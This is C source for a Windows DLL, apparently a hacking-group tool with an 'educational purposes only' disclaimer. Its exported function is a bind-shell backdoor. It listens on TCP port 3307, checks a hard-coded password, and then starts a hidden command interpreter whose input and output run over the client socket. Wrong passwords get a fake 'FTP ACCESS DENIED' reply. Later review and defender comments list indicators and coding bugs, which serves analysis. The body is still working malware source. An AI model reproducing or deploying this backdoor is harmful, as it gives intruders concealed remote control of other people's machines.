- /*
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- +This is a little disclaimer in case you haven't read the one on our site. +
- +The tools and tutorials KD-Team develops and publishes are meant for +
- +educational purposes only. WE DO NOT encourage the use of these tools and +
- +tutorials for malicious purposes. We learned a lot during the development of them +
- +so we hope you also learn and don't just use it without any brains. +
- +We take completely NO responsibility for any damage caused by them nor +
- +are we or our isp responsible for what you do with them. +
- +Greetz: KD-Team +
- +http://www.kd-team.com +
- ++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
- */
- #include <winsock2.h>
- #include <windows.h>
- #include <stdio.h>
- #include <stdlib.h>
- #define SERVPORT 3307
- #define RCVBUFSIZE 32
- #define PASSWORD "itworksihope"
- extern "C" __declspec (dllexport) int shell() // DLL export with C linkage; takes no arguments and returns 0 once the accept loop below ends.
- { // Defender note: the listening port (SERVPORT), the PASSWORD literal and the fixed reply sent on a wrong password are compile-time constants, so they are stable indicators for this build.
- // Bind-shell listener: accepts TCP clients on SERVPORT on all local interfaces and, once the first recv() matches PASSWORD, runs the COMSPEC interpreter with its standard handles set to the client socket.
- WSADATA wsa;
- SOCKET hSock;
- SOCKET hLstnSock;
- unsigned int ClientLen;
- struct sockaddr_in ServAddr;
- struct sockaddr_in ClientAddr;
- STARTUPINFO si;
- PROCESS_INFORMATION pi={0};
- int BytesRcvd;
- char *tok;
- char echoBuffer[RCVBUFSIZE]; // not initialised; written only by recv() below
- char comspec[MAX_PATH];
- // Initialise Winsock, requesting version 2.0.
- if(WSAStartup(MAKEWORD(2,0),&wsa) != 0)
- {
- //printf("WSAStartup() failed\n");
- } // NOTE(review): a WSAStartup failure is ignored; execution continues.
- // Zero the server address, then fill it: IPv4, any local interface (INADDR_ANY), port SERVPORT.
- memset(&ServAddr,0,sizeof(ServAddr));
- ServAddr.sin_family = AF_INET;
- ServAddr.sin_addr.s_addr = htonl(INADDR_ANY);
- ServAddr.sin_port = htons(SERVPORT);
- // Create the listening socket. Author note: it must be WSASocket, otherwise the handle is not passed on to the child process.
- if((hLstnSock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP,0,0,0)) < 0)
- {
- //printf("socket() %d failed\n",WSAGetLastError());
- WSACleanup();
- } // NOTE(review): SOCKET is an unsigned type in winsock2.h, so the < 0 test above cannot be true (failure is INVALID_SOCKET); this branch also does not return.
- // Bind the listening socket to the address filled in above.
- if(bind(hLstnSock,(struct sockaddr *)&ServAddr,sizeof(ServAddr)) < 0)
- {
- //printf("bind() %d failed\n",WSAGetLastError());
- closesocket(hLstnSock);
- } // NOTE(review): on bind failure the socket is closed but execution continues to listen().
- // Start listening with a backlog of 1.
- if(listen(hLstnSock,1)< 0)
- {
- //printf("listen() %d failed\n",WSAGetLastError());
- closesocket(hLstnSock);
- WSACleanup();
- } // NOTE(review): no return here either, so the accept loop below is still entered after a failed listen().
- // Serve clients one at a time until accept() fails or a break below ends the loop.
- while(1)
- {
- ClientLen = sizeof(ClientAddr);
- // Accept the next incoming connection.
- hSock = accept(hLstnSock, (struct sockaddr *)&ClientAddr, (int *)&ClientLen);
- if(hSock == INVALID_SOCKET)
- {
- break;
- }
- BytesRcvd = recv(hSock, echoBuffer,RCVBUFSIZE -1,0); // single read of at most RCVBUFSIZE-1 bytes; no terminator is written after the data
- if(BytesRcvd > 0)
- {
- // Authentication: one cleartext comparison of the first received line against the compile-time PASSWORD.
- // strtok() is called only for its side effect of replacing the first newline with a terminator; tok is never read. NOTE(review): echoBuffer was never initialised, so without a newline the comparison may read stale stack bytes beyond the received data.
- tok = strtok(echoBuffer,"\n");
- if((strcmp(echoBuffer,PASSWORD))==0)
- {
- //printf("Pass correct\n");
- // Password matched: start the command interpreter for this client.
- memset(&si,0,sizeof(si));
- GetStartupInfo(&si);
- // Override the inherited startup info: hidden window, and stdin/stdout/stderr all redirected to the client socket.
- si.cb = sizeof(si);
- si.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW;
- si.wShowWindow = SW_HIDE;
- si.hStdInput = (HANDLE)hSock;
- si.hStdOutput = (HANDLE)hSock;
- si.hStdError =(HANDLE)hSock;
- // Take the interpreter path from the COMSPEC environment variable instead of hard-coding cmd.exe.
- if(GetEnvironmentVariable("COMSPEC", comspec, MAX_PATH) == 0)
- {
- //printf("Environment var failed\n");
- break; // NOTE(review): leaves the loop without closing hSock; the listener is then closed and the function returns
- }
- // Launch the interpreter with handle inheritance enabled (TRUE) in a new console. Defender note: this shows up as a command interpreter whose parent is the process that called this export and whose standard handles are a socket.
- if(!CreateProcess(NULL,comspec, NULL, NULL, TRUE, CREATE_NEW_CONSOLE, 0, NULL, &si, &pi)) //CREATE_NO_WINDOW
- {
- //printf("process creation failed\n");
- break; // NOTE(review): same as the COMSPEC failure path, hSock is not closed here
- }
- // Block until the child exits, so only one client session is served at a time.
- WaitForSingleObject(pi.hProcess, INFINITE);
- // Release the process and thread handles and close the client socket.
- CloseHandle(pi.hProcess);
- CloseHandle(pi.hThread);
- closesocket(hSock);
- }
- else
- {
- // Wrong password: send a fixed reply and drop the connection. NOTE(review): the reply text is presumably meant to resemble an FTP service.
- //printf("incorrect pass\n");
- send(hSock,"FTP ACCESS DENIED\n",strlen("FTP ACCESS DENIED\n"),0);
- closesocket(hSock);
- }
- } // NOTE(review): when recv() returns 0 or an error, hSock is never closed before the next accept().
- }
- closesocket(hLstnSock);
- return 0; // NOTE(review): WSACleanup() is not called on this path.
- }